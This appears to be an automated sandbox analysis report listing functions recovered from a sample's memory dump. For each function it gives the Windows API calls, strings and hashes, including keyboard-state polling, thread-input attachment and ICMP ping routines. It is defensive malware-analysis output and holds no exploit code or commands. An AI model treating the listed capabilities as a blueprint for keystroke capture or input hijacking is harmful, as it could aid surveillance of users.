API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 20de80293038ebc0a70c8148e7019ebce42e84b642c52488bd02a9115f57ab98
Instruction ID: 517aac770418fc73d58b37f4d78b8aca41ef7bb9d4496640420507fa828665d5
Opcode Fuzzy Hash: 20de80293038ebc0a70c8148e7019ebce42e84b642c52488bd02a9115f57ab98
Instruction Fuzzy Hash: 0BC10271608205AFD700DF68C88492AB7F9FF89789F10495DF98ADB211DB71EE09CB52

Function 00847A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00847AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00847B8F
SHGetDesktopFolder.SHELL32(?), ref: 00847BA3
CoCreateInstance.OLE32(0086FD08,00000000,00000001,00896E6C,?), ref: 00847BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00847C74
CoTaskMemFree.OLE32(?,?), ref: 00847CCC
SHBrowseForFolderW.SHELL32(?), ref: 00847D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00847D7A
CoTaskMemFree.OLE32(00000000), ref: 00847D81
CoTaskMemFree.OLE32(00000000), ref: 00847DD6
CoUninitialize.OLE32 ref: 00847DDC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 60ae298c2f40d567cc8e2f253db22822c1c4d5ff885a86d8babf40747f1ad6cb
Instruction ID: 21a2b8877e65ca00af6b8e478677939273c7a61781360d2c5bd69e6a27840503
Opcode Fuzzy Hash: 60ae298c2f40d567cc8e2f253db22822c1c4d5ff885a86d8babf40747f1ad6cb
Instruction Fuzzy Hash: F2C11A75A04109EFCB14DFA4C888DAEBBB9FF48314B1584A9E91ADB361D730ED45CB90

Function 0086541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00865504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00865515
CharNextW.USER32(00000158), ref: 00865544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00865585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0086559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008655AC

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 0db35870c64301203f4cab6e491897749c151997f25227e9940f1aed7ae6d787
Instruction ID: bd7f8c4c0bfd6d811c49b81ba92471a2f9d6fd418878393d60eae1814df6ffb2
Opcode Fuzzy Hash: 0db35870c64301203f4cab6e491897749c151997f25227e9940f1aed7ae6d787
Instruction Fuzzy Hash: E3618E70900609EFDF109F64CC899FE7BB9FB09724F124189F965EB290DB748A81DB61

Function 0082FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0082FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0082FB08
VariantInit.OLEAUT32(?), ref: 0082FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0082FB3A
VariantCopy.OLEAUT32(?,?), ref: 0082FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0082FBA1
VariantClear.OLEAUT32(?), ref: 0082FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0082FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082FBCC
VariantClear.OLEAUT32(?), ref: 0082FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0082FBE9

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 2440cec3db5bf7b437308043784570e3bc01acb52faa749527d4f25f0a0700e1
Instruction ID: 35b48653fbfd16d19f71ed74b97969caac005f078034ab9e5646c602c364acda
Opcode Fuzzy Hash: 2440cec3db5bf7b437308043784570e3bc01acb52faa749527d4f25f0a0700e1
Instruction Fuzzy Hash: AA413035A00229DFCB00DF68D8589ADBBB9FF48354F418075E946E7262CB74A945CFA0

Function 00839C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00839CA1
GetAsyncKeyState.USER32(000000A0), ref: 00839D22
GetKeyState.USER32(000000A0), ref: 00839D3D
GetAsyncKeyState.USER32(000000A1), ref: 00839D57
GetKeyState.USER32(000000A1), ref: 00839D6C
GetAsyncKeyState.USER32(00000011), ref: 00839D84
GetKeyState.USER32(00000011), ref: 00839D96
GetAsyncKeyState.USER32(00000012), ref: 00839DAE
GetKeyState.USER32(00000012), ref: 00839DC0
GetAsyncKeyState.USER32(0000005B), ref: 00839DD8
GetKeyState.USER32(0000005B), ref: 00839DEA

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 8430129e5bf5ab2386c9aa56c036ab9cfe58c71bea8e42ab182ca9370fa7d591
Instruction ID: d196d1a90cdf961a7e8aff70a705aacb50b37c7dbff452fa69bb8a123b7b4932
Opcode Fuzzy Hash: 8430129e5bf5ab2386c9aa56c036ab9cfe58c71bea8e42ab182ca9370fa7d591
Instruction Fuzzy Hash: 2A41C6345047CA6DFF319664C8053B6BEA0FF91344F04905ADAC7966C2EBE599C8CBE2

Function 0085055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 008505BC
inet_addr.WSOCK32(?), ref: 0085061C
gethostbyname.WSOCK32(?), ref: 00850628
IcmpCreateFile.IPHLPAPI ref: 00850636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008506C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008506E5
IcmpCloseHandle.IPHLPAPI(?), ref: 008507B9
WSACleanup.WSOCK32 ref: 008507BF

Strings

Ping, xrefs: 00850676

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d67d028f2a514872c391ab8fe2ef57f4a28ade8d26df2662e5184a16291238e1
Instruction ID: 0a153e0960a5cf715975a88fdbfc7ff18921141dbb3ef0dddbb89cd812cbc500
Opcode Fuzzy Hash: d67d028f2a514872c391ab8fe2ef57f4a28ade8d26df2662e5184a16291238e1
Instruction Fuzzy Hash: 7E91AC356042019FD320CF15C888B1ABBE0FF48318F0585A9E8AADB7A2D771ED49CF81

Function 00858CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00858CF3

Part of subcall function 00838E54: _wcslen.LIBCMT ref: 00838E77

_wcslen.LIBCMT ref: 00858D4E
_wcslen.LIBCMT ref: 00858D9C
_wcslen.LIBCMT ref: 00858DDC
_wcslen.LIBCMT ref: 00858E6E

Strings

stdcall, xrefs: 00858DD6, 00858DDB
none, xrefs: 00858E65, 00858E6A
winapi, xrefs: 00858D96, 00858D9B
cdecl, xrefs: 00858D48, 00858D4D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: cdf42a91e6545e0076ce4e6e6f6b50729dae362b7232430795148f40ec071761
Instruction ID: be8dd7d3d7437a016448632e7facb493c8f2fea5fb4cb281cbced1c1ccf50328
Opcode Fuzzy Hash: cdf42a91e6545e0076ce4e6e6f6b50729dae362b7232430795148f40ec071761
Instruction Fuzzy Hash: 96518F31A00116DBCF14DF68C9418BEB7B5FF64725B24422AE966F7284EB35DD488B90

Function 0085372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00853774
CoUninitialize.OLE32 ref: 0085377F
CoCreateInstance.OLE32(?,00000000,00000017,0086FB78,?), ref: 008537D9
IIDFromString.OLE32(?,?), ref: 0085384C
VariantInit.OLEAUT32(?), ref: 008538E4
VariantClear.OLEAUT32(?), ref: 00853936

Strings

Failed to create object, xrefs: 008537E4, 0085389A
Invalid parameter, xrefs: 00853865
NULL Pointer assignment, xrefs: 0085381E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 8e6fa2f9ba039c71ec129594167f5da1d37a56e436936cd0bbbffcc5b32ad6be
Instruction ID: ce8a12f9bb85f01563f86486691603e80e239cdc5b8e0c63dce344f28acd0dd4
Opcode Fuzzy Hash: 8e6fa2f9ba039c71ec129594167f5da1d37a56e436936cd0bbbffcc5b32ad6be
Instruction Fuzzy Hash: 2C61B0B0608301AFD715DF64C849B6ABBE4FF49755F100829F985DB291D770EE48CBA2

Function 00848195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00848257
SystemTimeToFileTime.KERNEL32(?,?), ref: 00848267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00848273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00848310
SetCurrentDirectoryW.KERNEL32(?), ref: 00848324
SetCurrentDirectoryW.KERNEL32(?), ref: 00848356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0084838C
SetCurrentDirectoryW.KERNEL32(?), ref: 00848395

Strings

*.*, xrefs: 0084839B

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: f4795a6cc640796550fa7bdd809157248e14e347dd8a1560610a104bad1f93f5
Instruction ID: 768f29045e7cae4513883624ed1f0b8053c9229c344efc334857b0b88fa17ab2
Opcode Fuzzy Hash: f4795a6cc640796550fa7bdd809157248e14e347dd8a1560610a104bad1f93f5
Instruction Fuzzy Hash: 2B6135B2504209DFCB10EF64D8449AEB3E8FF89314F04891AF99AD7351EB35E945CB92

Function 00843388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 008433CF

Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 008433F0

Strings

Error: , xrefs: 008434D1
"%s" (%d) : ==> %s:%s%s, xrefs: 00843504
"%s" (%d) : ==> %s:, xrefs: 00843522
Incorrect parameters to object property !, xrefs: 008434AB
Line %d (File "%s"):, xrefs: 00843443, 0084345C
^ ERROR , xrefs: 0084349E

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 91ca082caf287575c2a5e19384196faa64f6296d4a9a4fcfc1d6daf1ab464c90
Instruction ID: e830ef5e84145a0ef067986918787661264f7c0e984a66954d99ae8d286ff4d8
Opcode Fuzzy Hash: 91ca082caf287575c2a5e19384196faa64f6296d4a9a4fcfc1d6daf1ab464c90
Instruction Fuzzy Hash: 08518D71900209EADF15EBA0CD4AEEEB778FF14340F144066F505B2292EB692F58DB61

Function 0083B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0083B5FC
_wcslen.LIBCMT ref: 0083B608
_wcslen.LIBCMT ref: 0083B64D
_wcslen.LIBCMT ref: 0083B68C
_wcslen.LIBCMT ref: 0083B6C7

Strings

APPEND, xrefs: 0083B6C1, 0083B6C6
KEYS, xrefs: 0083B647, 0083B64C
EXISTS, xrefs: 0083B686, 0083B68B
REMOVE, xrefs: 0083B602, 0083B607

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: c8d2496c6fde1d30815331842ccd65cdf3b6bea03b0129f30dd31bcfe6acdd0a
Instruction ID: 22382b54d88d43e96c9f9218db468c4621e4b9314321ec98d386e547520b180d
Opcode Fuzzy Hash: c8d2496c6fde1d30815331842ccd65cdf3b6bea03b0129f30dd31bcfe6acdd0a
Instruction Fuzzy Hash: CB41C5B2A010269BCB10AEBDC8925BE77A5FBF0754F244229E625DB285F735CD81C7D0

Function 00845393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 008453A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00845416
GetLastError.KERNEL32 ref: 00845420
SetErrorMode.KERNEL32(00000000,READY), ref: 008454A7

Strings

UNKNOWN, xrefs: 00845444
INVALID, xrefs: 00845459
READONLY, xrefs: 00845452
NOTREADY, xrefs: 0084544B
READY, xrefs: 00845460, 00845468

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 08f76b937d81b83b4d0ae9023f48dc1081098e6fd2cc52fdf816a0ca1b9169cc
Instruction ID: e794de0972d3a70c1213ce0c55684f93d9b9a78e5f5976f7a8ccb79c6fa89ffe
Opcode Fuzzy Hash: 08f76b937d81b83b4d0ae9023f48dc1081098e6fd2cc52fdf816a0ca1b9169cc
Instruction Fuzzy Hash: 8B318FB5A006089FCB10DF68C488AAEBBB4FB45349F188065E505DF392EB75DD86CB91

Function 00863C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00863C79
SetMenu.USER32(?,00000000), ref: 00863C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00863D10
IsMenu.USER32(?), ref: 00863D24
CreatePopupMenu.USER32 ref: 00863D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00863D5B
DrawMenuBar.USER32 ref: 00863D63

Strings

F, xrefs: 00863D4E
0, xrefs: 00863C54

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 1bb2f38f05a6b4fb10391ae6a6ba6bab0e1392cf8ece4fdbd5582c83bd0a2536
Instruction ID: c74289dd685febd9472434ac8a680af2c0854c2267083ba4db7badbdf6527061
Opcode Fuzzy Hash: 1bb2f38f05a6b4fb10391ae6a6ba6bab0e1392cf8ece4fdbd5582c83bd0a2536
Instruction Fuzzy Hash: CA413779A01209EFDF14DF64DC88AAABBB5FF49350F150029FA46A7360D771AA10CB94

Function 00863A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00863A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00863AA0
GetWindowLongW.USER32(?,000000F0), ref: 00863AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00863AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00863B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00863BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00863BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00863BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00863BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00863C13

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: c59a214f965e6eb3b455eadcf739ebc60044a91f6f00aa9ecbc8637647108561
Instruction ID: e45152fc0b7719976389e8a4eecb90c29dda43839306d88e3fccdc5d70103545
Opcode Fuzzy Hash: c59a214f965e6eb3b455eadcf739ebc60044a91f6f00aa9ecbc8637647108561
Instruction Fuzzy Hash: FC617775A00208AFDB11DFA8CC85EEEB7B8FF09714F14019AFA15E72A1C774AA41DB50

Function 0083B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0083B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B165
GetWindowThreadProcessId.USER32(00000000), ref: 0083B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0083B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0083A1E1,?,00000001), ref: 0083B21D

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.0000000000892000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445699877.000000000089C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445771999.00000000008A4000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7d0000_ca798c703b.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: da8df6e32dd116b085f5b8236f618cd3d2681fb4193a32926f6f01ae1dbd554b
Instruction ID: ab6a9fd5095eebcf10184cc4fbebd952508abdfc1800ebfe621b6dff2f691d3c
Opcode Fuzzy Hash: da8df6e32dd116b085f5b8236f618cd3d2681fb4193a32926f6f01ae1dbd554b
Instruction Fuzzy Hash: 0E318DB5500604BFEB109F64DC49F7EBBA9FBA2311F114519FB06D6190D7B89E408FA4

Function 00802C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00802C94

Part of subcall function 008029C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000), ref: 008029DE
Part of subcall function 008029C8: GetLastError.KERNEL32(00000000,?,0080D7D1,00000000,00000000,00000000,00000000,?,0080D7F8,00000000,00000007,00000000,?,0080DBF5,00000000,00000000), ref: 008029F0

_free.LIBCMT ref: 00802CA0
_free.LIBCMT ref: 00802CAB
_free.LIBCMT ref: 00802CB6
_free.LIBCMT ref: 00802CC1
_free.LIBCMT ref: 00802CCC
_free.LIBCMT ref: 00802CD7
_free.LIBCMT ref: 00802CE2
_free.LIBCMT ref: 00802CED
_free.LIBCMT ref: 00802CFB

Memory Dump Source

Source File: 00000008.00000002.4445392010.00000000007D1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000008.00000002.4445321834.00000000007D0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.4445538730.000000000086C000.00000002.00000001.01000000.0000000C.sdmpDownload File
